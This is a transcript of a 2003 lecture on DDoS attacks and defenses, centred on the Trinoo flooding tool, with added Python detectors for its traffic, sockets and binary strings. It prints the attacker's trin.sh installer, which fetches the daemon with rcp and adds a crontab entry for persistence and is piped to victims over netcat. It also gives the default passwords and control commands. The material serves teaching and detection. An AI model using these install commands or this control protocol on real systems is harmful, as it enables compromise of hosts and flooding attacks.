An Introduction to DDoS And the “Trinoo” Attack Tool Prepared by Ray Lam, Ivan Wong July 10, 2003.

Presentation transcript:


Outline
- Background on DDoS
  - Attack mechanism
  - Ways to defend
- The attack tool – Trinoo
  - Introduction
  - Attack scenario
  - Symptoms and defense
  - Weaknesses and next evolution

Background on DDoS: Attack mechanism

Denial-of-Service
- Flooding-based: send packets to victims to exhaust
  - Network resources
  - System resources
- Traditional DoS: one attacker
- Distributed DoS: countless attackers

Attack Mechanism (figure; A = attacker, R = reflector, V = victim)
- Direct attack: A sends TCP SYN, ICMP, UDP... packets to V with R's address as the source IP address; V's replies (TCP SYN-ACK, TCP RST, ICMP, UDP...) go to R.
- Reflector attack: A sends TCP SYN, ICMP, UDP... packets to R with V's address as the source IP address; R's replies (TCP SYN-ACK, TCP RST, ICMP, UDP...) go to V.

Attack Architecture (figure)
- Direct attack: Attacker -> Masters (handlers) -> Agents (daemons or zombies) -> Victim (V). Agents send TCP SYN, ICMP, UDP... packets; the source IP addresses are usually spoofed.
- Reflector attack: Attacker -> Masters (handlers) -> Agents (daemons or zombies) -> Reflectors -> Victim (V). Agents send TCP SYN, ICMP, UDP... packets with V's address as the source IP address; the reflectors' replies (TCP SYN-ACK, TCP RST, ICMP, UDP...) reach V.

Attack Methods
Attack             | Attack packets                          | Reply packets
Smurf              | ICMP echo queries to broadcast address  | ICMP echo replies
SYN flooding       | TCP SYN packets                         | TCP SYN-ACK packets
RST flooding       | TCP packets to closed ports             | TCP RST packets
ICMP flooding      | ICMP queries                            | ICMP replies
                   | UDP packets to closed ports             | ICMP port unreachable
                   | IP packets with low TTL                 | ICMP time exceeded
DNS reply flooding | DNS queries (recursive) to DNS servers  | DNS replies

Backscatter Analysis (Moore et al.)
- Measured DoS activity on the Internet
  - TCP (94+ %)
  - UDP (2 %)
  - ICMP (2 %)
- TCP attacks based mainly on SYN flooding

Background on DDoS: Ways to defend

Strategy
Three lines of defense:
- Attack prevention - before the attack
- Attack detection and filtering - during the attack
- Attack source traceback - during and after the attack

Attack prevention
- Protect hosts from installation of masters and agents by attackers
- Scan hosts for symptoms of agents being installed
- Monitor network traffic for known message exchanges among attackers, masters and agents

Attack prevention
- Inadequate and hard to deploy
- Users who don't care leave security holes
- ISP and enterprise networks have no incentive to deploy it

Attack source traceback
- Identify the actual origin of a packet without relying on its source IP
- Two approaches
  - Routers record information about packets
  - Routers send additional information about packets to the destination

Attack source traceback
- Source traceback cannot stop an ongoing DDoS attack
  - Cannot trace origins behind firewalls or NAT (network address translators)
  - More to do for reflector attacks (attack packets come from legitimate sources)
- Useful in post-attack law enforcement

Attack detection and filtering
- Detection
  - Identify the DDoS attack and the attack packets
- Filtering
  - Classify normal and attack packets
  - Drop attack packets

Attack detection and filtering
- Can be done in 4 places
  - Victim's network
  - Victim's ISP network
  - Further upstream ISP networks
  - Attack source networks
- Dispersed agents send packets to a single victim, like pouring packets into the top of a funnel

Attack detection and filtering (figure: funnel from the attack source networks through the further upstream ISP networks and the victim's ISP network down to the victim's network and the victim)
- Moving toward the attack sources, the effectiveness of filtering increases
- Moving toward the victim, the effectiveness of detection increases

Attack detection and filtering
- Detection
  - Easy at the victim's network – large amount of attack packets
  - Difficult at an individual agent's network – small amount of attack packets
- Filtering
  - Effective at the agents' networks – less likely to drop normal packets
  - Ineffective at the victim's network – more normal packets are dropped

D&F at agent's network
- Usually cannot detect a DDoS attack
- Can filter attack packets with spoofed source addresses
  - Attack packets in direct attacks
  - Attack packets from agents to reflectors in reflector attacks
- Ensuring that all ISPs install ingress packet filtering is impossible

D&F at victim's network
- Detect DDoS attack
  - Unusually high volume of incoming traffic of certain packet types
  - Degraded server and network performance
- Filtering is ineffective
  - Attack and normal packets have the same destination – victim's IP and port
  - Attack packets have spoofed source IPs or come from many different IPs
  - Attack and normal packets are indistinguishable

D&F at victim's upstream ISP
- Often requested by the victim to filter attack packets
- Alert protocol
  - Victim cannot receive an ACK from the ISP
  - Requires strong authentication and encryption
- Filtering ineffective: the ISP network may also be jammed

D&F at further upstream ISP
- Backpressure approach
  - Victim detects the DDoS attack
  - Upstream ISPs filter the attack packets

The attack tool – Trinoo: Introduction

- Discovered in August 1999
- Daemons found on Solaris 2.x systems
- Attacked a system at the University of Minnesota
- Victim unusable for 2 days

Attack type
- UDP flooding
- Default size of UDP packet: 1000 bytes
  - malloc() a buffer of this size and send its uninitialized content
- Default period of attack: 120 seconds
- Destination port: randomly chosen from 0 – 65534

The attack tool – Trinoo: Attack scenario

Installation
1. Hack an account
   - Acts as a repository for scanning tools, attack tools, Trinoo daemons, Trinoo masters, etc.
   - Requirements
     - High bandwidth connection
     - Large number of users
     - Little administrative oversight

Installation
2. Compromise systems
   - Look for vulnerable systems: unpatched Sun Solaris and Linux
   - Remote buffer overflow exploitation
     - Set up root account
     - Open TCP ports
   - Keep a `friend list`

Installation
3. Install daemons
   - Use "netcat" ("nc") and "trin.sh"
   - netcat: network version of "cat"
   - trin.sh: shell script to set up daemons
       ./trin.sh | nc 128.aaa &
       ./trin.sh | nc 128.aaa &

Installation: trin.sh
    echo "rcp :leaf /usr/sbin/rpc.listen"
    echo "echo rcp is done moving binary"
    echo "chmod +x /usr/sbin/rpc.listen"
    echo "echo launching trinoo"
    echo "/usr/sbin/rpc.listen"
    echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
    echo "crontab cron"
    echo "echo launched"
    echo "exit"

Architecture (figure): Attacker -> Masters (handlers) -> Agents (daemons or zombies) -> Victim (direct attack)

Communication ports
- Monitor specific ports to detect the presence of a master or agent
- Attacker -> Master: TCP port 27665
- Master -> Daemon: UDP port 27444
- Daemon -> Master: UDP port 31335

Password protection
- Password used to prevent administrators or other hackers from taking control
- Encrypted password compiled into master and daemon using crypt()
- Clear-text password is sent over the network – the session is not encrypted
- Received password is encrypted and compared

Password protection
- Default passwords
  - "l44adsl" – trinoo daemon password
  - "gOrave" – trinoo master server startup
  - "betaalmostdone" – trinoo master remote interface password
  - "killme" – trinoo master password to control the "mdie" command

Login to master
- Telnet to the master's TCP port on the host running the master
- Enter password "betaalmostdone"
- Warns if others try to connect to the master
    root]# telnet r
    Trying
    Connected to r1.router ( ).
    Escape character is '^]'.
    betaalmostdone
    trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
    trinoo>

Master and daemon
- Communicate by UDP packets
- Command line format: arg1 password arg2
- Default password is "l44adsl"
- When a daemon starts, it sends "HELLO" to the master
- Master maintains a list of daemons

Master commands
- dos IP
  - DoS the IP address specified
  - "aaa l44adsl IP" sent to each daemon
- mdos
  - DoS the IPs simultaneously
- mtimer N
  - Set attack period to N seconds

Master commands
- bcast
  - List all daemons' IPs
- mdie password
  - Shut down all daemons
- killdead
  - Invite all daemons to send "HELLO" to the master
  - Delete all dead daemons from the list

Daemon commands
- Not used directly; only the master uses them to send commands to daemons
- Consist of 3 letters
  - Avoids exposing the commands when someone runs the Unix command "strings" (with its default minimum length) on the binary

Daemon commands
- aaa password IP
  - DoS the specified IP
- bbb password N
  - Set attack period to N seconds
- rsz password N
  - Set attack packet size to N bytes
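As an added example (not from the slides or from the Trinoo analysis), a small detector that applies the master/daemon command format and UDP ports above to captured datagrams; the sample datagrams, the decoded command names and the Finding class are constructed here for illustration.

```python
from dataclasses import dataclass
from typing import Optional

# Ports and strings as given in the slides: master -> daemon commands go to
# UDP 27444, daemons announce themselves to the master on UDP 31335.
DAEMON_PORT = 27444
MASTER_PORT = 31335
DAEMON_COMMANDS = {"aaa": "dos", "bbb": "set_timer", "rsz": "set_packet_size"}
DEFAULT_DAEMON_PASSWORD = "l44adsl"

@dataclass
class Finding:
    kind: str                   # "master_to_daemon" or "daemon_to_master"
    command: str                # decoded command, e.g. "dos"
    password: str = ""
    arg: str = ""
    default_password: bool = False

def inspect_udp_payload(dst_port: int, payload: bytes) -> Optional[Finding]:
    """Return a Finding if this datagram looks like Trinoo control traffic."""
    text = payload.decode("ascii", errors="replace").strip()
    if dst_port == MASTER_PORT and text == "HELLO":
        return Finding("daemon_to_master", "hello")
    if dst_port != DAEMON_PORT:
        return None
    # Command line format from the slides: "arg1 password arg2"
    parts = text.split()
    if len(parts) != 3 or parts[0] not in DAEMON_COMMANDS:
        return None
    cmd, password, arg = parts
    return Finding("master_to_daemon", DAEMON_COMMANDS[cmd], password, arg,
                   password == DEFAULT_DAEMON_PASSWORD)

# Constructed sample datagrams (dst_port, payload), not a real capture.
SAMPLE_DATAGRAMS = [
    (31335, b"HELLO"),
    (27444, b"aaa l44adsl 192.0.2.10"),
    (27444, b"bbb l44adsl 600"),
    (27444, b"rsz l44adsl 1400"),
    (53, b"\x12\x34\x01\x00"),          # ordinary DNS query, ignored
    (27444, b"GET / HTTP/1.0"),         # wrong format, ignored
]

def scan(datagrams):
    """All Trinoo-looking datagrams in a list of (dst_port, payload)."""
    return [f for f in (inspect_udp_payload(p, d) for p, d in datagrams) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_DATAGRAMS):
        print(finding)
```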

The attack tool – Trinoo: Symptoms and defense

Symptoms: Masters
- Crontab
    * * * * * /usr/sbin/rpc.listen
- Friend list (files "..." and "...-b")
    # ls -l ... ...-b
    -rw  root root 25 Sep 26 14:   ...
    -rw  root root 50 Sep 26 14:30 ...-b

Symptoms: Masters (cont'd)
- Socket status
    # netstat -a --inet
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address  Foreign Address  State
    tcp        0      0 *:27665        *:*              LISTEN
    ...
    udp        0      0 *:31335        *:*
    ...

Symptoms: Masters (cont'd)
- File status
    # lsof | egrep ":31335|:27665"
    master 1292 root 3u inet 2460 UDP *:31335
    master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)
    # lsof -p 1292
    COMMAND PID  USER FD  TYPE DEVICE SIZE NODE NAME
    master  1292 root cwd DIR  3,     /tmp/...
    master  1292 root rtd DIR  3,     /
    master  1292 root txt REG  3,     /tmp/.../master
    master  1292 root mem REG  3,     /lib/ld so
    master  1292 root mem REG  3,     /lib/libcrypt so

Symptoms: Daemons
- Socket status
    # netstat -a --inet
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address  Foreign Address  State
    ...
    udp        0      0 *:1024         *:*
    udp        0      0 *:27444        *:*
    ...

Symptoms: Daemons (cont'd)
- File status
    # lsof | egrep ":27444"
    ns 1316 root 3u inet 2502 UDP *:27444
    # lsof -p 1316
    COMMAND PID  USER FD  TYPE DEVICE SIZE NODE NAME
    ns      1316 root cwd DIR  3,     /tmp/...
    ns      1316 root rtd DIR  3,     /
    ns      1316 root txt REG  3,     /tmp/.../ns
    ns      1316 root mem REG  3,     /lib/ld so
    ns      1316 root mem REG  3,     /lib/libcrypt so
    ns      1316 root mem REG  3,     /lib/libc so
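As an added example (not from the slides), a host check that reads the netstat and lsof output shown in the symptoms slides and flags sockets on the three Trinoo ports; the sample output below is constructed after the slides, not a real capture.

```python
import re

# Trinoo listening ports from the slides: the master has TCP 27665 (attacker
# login) and UDP 31335 (daemon -> master); a daemon has UDP 27444 (master -> daemon).
TRINOO_PORTS = {
    ("tcp", 27665): "master (attacker login port)",
    ("udp", 31335): "master (daemon -> master port)",
    ("udp", 27444): "daemon (master -> daemon port)",
}

# Proto and Local Address columns of "netstat -a --inet".
NETSTAT_RE = re.compile(r"^(tcp|udp)\s+\d+\s+\d+\s+(\S+):(\d+)\s+")
# lsof lines such as "master 1292 root 3u inet 2460 UDP *:31335".
LSOF_RE = re.compile(r"^(\S+)\s+(\d+)\s+\S+\s+\S+\s+inet\s+\d+\s+(TCP|UDP)\s+\S+:(\d+)")

def netstat_findings(lines):
    found = []
    for line in lines:
        m = NETSTAT_RE.match(line.strip())
        if m and (m.group(1), int(m.group(3))) in TRINOO_PORTS:
            key = (m.group(1), int(m.group(3)))
            found.append({"proto": key[0], "port": key[1], "role": TRINOO_PORTS[key]})
    return found

def lsof_findings(lines):
    found = []
    for line in lines:
        m = LSOF_RE.match(line.strip())
        if m and (m.group(3).lower(), int(m.group(4))) in TRINOO_PORTS:
            key = (m.group(3).lower(), int(m.group(4)))
            found.append({"command": m.group(1), "pid": int(m.group(2)),
                          "proto": key[0], "port": key[1], "role": TRINOO_PORTS[key]})
    return found

def classify_host(netstat_lines, lsof_lines):
    """'master', 'daemon', 'daemon+master' or 'clean' from the findings."""
    roles = {f["role"].split()[0]
             for f in netstat_findings(netstat_lines) + lsof_findings(lsof_lines)}
    return "+".join(sorted(roles)) if roles else "clean"

# Constructed sample output modelled on the slides.
SAMPLE_NETSTAT = """Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address  Foreign Address  State
tcp        0      0 *:22           *:*              LISTEN
tcp        0      0 *:27665        *:*              LISTEN
udp        0      0 *:31335        *:*
udp        0      0 *:1024         *:*""".splitlines()
SAMPLE_LSOF = """master 1292 root 3u inet 2460 UDP *:31335
master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)
sshd    410 root 3u inet  900 TCP *:22 (LISTEN)""".splitlines()

if __name__ == "__main__":
    print(classify_host(SAMPLE_NETSTAT, SAMPLE_LSOF))
```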

Defenses
- Prevent root-level compromise
  - Patch systems
  - Set up firewalls
  - Monitor traffic
- Block abused ports
  - High-numbered UDP ports
  - Trade-off: also blocks normal programs using the same ports

The attack tool – Trinoo: Weaknesses and next evolution

Weaknesses
- Single kind of attack
  - UDP flooding
  - Easily defended by a single defense tool
- Uses an IP as the destination address
  - "Moving target defense" – victim changes its IP to avoid the attack

Weaknesses
- Password, encrypted password and commands visible in binary images
  - Use the Unix command "strings" to obtain them
      strings master
      strings -n3 ns
  - Check whether Trinoo is found
  - Crack the encrypted passwords
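As an added example (not from the slides), a strings(1)-style scanner that shows why the 3-letter daemon commands stay hidden at the default minimum length of 4 but appear at length 3, and checks a binary image for the default password strings listed earlier; the image below is a constructed stand-in, not a real master binary.

```python
import string

# Printable bytes in the sense of strings(1): letters, digits, punctuation
# and space, but not other whitespace or control characters.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")

def extract_strings(data: bytes, min_len: int = 4):
    """Runs of printable bytes of at least min_len, as strings(1) reports
    them (its default minimum length is 4; "strings -n3" lowers it to 3)."""
    out, run = [], bytearray()
    for b in data + b"\0":            # trailing NUL flushes the final run
        if b in PRINTABLE:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    return out

# Strings taken from the slides: daemon commands and default passwords.
DAEMON_COMMANDS = {"aaa", "bbb", "rsz"}
TRINOO_MARKERS = {"l44adsl", "gOrave", "betaalmostdone", "killme", "trinoo"}

def trinoo_indicators(data: bytes):
    """Which Trinoo markers a plain 'strings' run finds (min length 4)
    versus a 'strings -n3' run (min length 3, which also reveals commands)."""
    default_hits = set(extract_strings(data, 4)) & TRINOO_MARKERS
    short_hits = set(extract_strings(data, 3)) & (TRINOO_MARKERS | DAEMON_COMMANDS)
    return {"min_len_4": sorted(default_hits), "min_len_3": sorted(short_hits)}

# Constructed stand-in for a master binary image: opaque bytes with the
# embedded strings NUL-separated, as a compiled binary would hold them.
SAMPLE_IMAGE = (b"\x7fELF\x01\x01\x01" + b"\x00" * 5
                + b"aaa\x00bbb\x00rsz\x00" + b"trinoo\x00"
                + b"\x90\x90" + b"l44adsl\x00HELLO\x00")

if __name__ == "__main__":
    print(trinoo_indicators(SAMPLE_IMAGE))
```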

Weaknesses
- Password travels in plain text over the network
  - Daemon password frequently sent in master-to-daemon commands
  - Obtain the password with "ngrep" or "tcpdump", which show the UDP payload

Uproot a Trinoo network
- Locate a daemon
- Use "strings" to obtain the IPs of its masters
- Contact the sites with masters installed
- Those sites check their list of daemons
  - By inspecting the file "..." or by getting the master login password and using the "bcast" command
  - Get the "mdie" password
  - Use "mdie" to shut down all daemons
  - Repeat "mdie" periodically, as daemons are restarted by crontab

Next evolution
- Combination of several attack types
  - SYN flood, UDP flood, ICMP flood...
  - Higher chance of a successful attack
- Stronger encryption of embedded strings and passwords
- Use of an encrypted communication channel
- Communication by a protocol that is difficult to detect or block, e.g. ICMP

References
- R. Chang, "Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial," IEEE Communications Magazine, Oct. 2002.
- D. Dittrich, "The DoS Project's 'trinoo' Distributed Denial of Service Attack Tool," trinoo.analysis.txt, Oct. 1999.

Open Discussion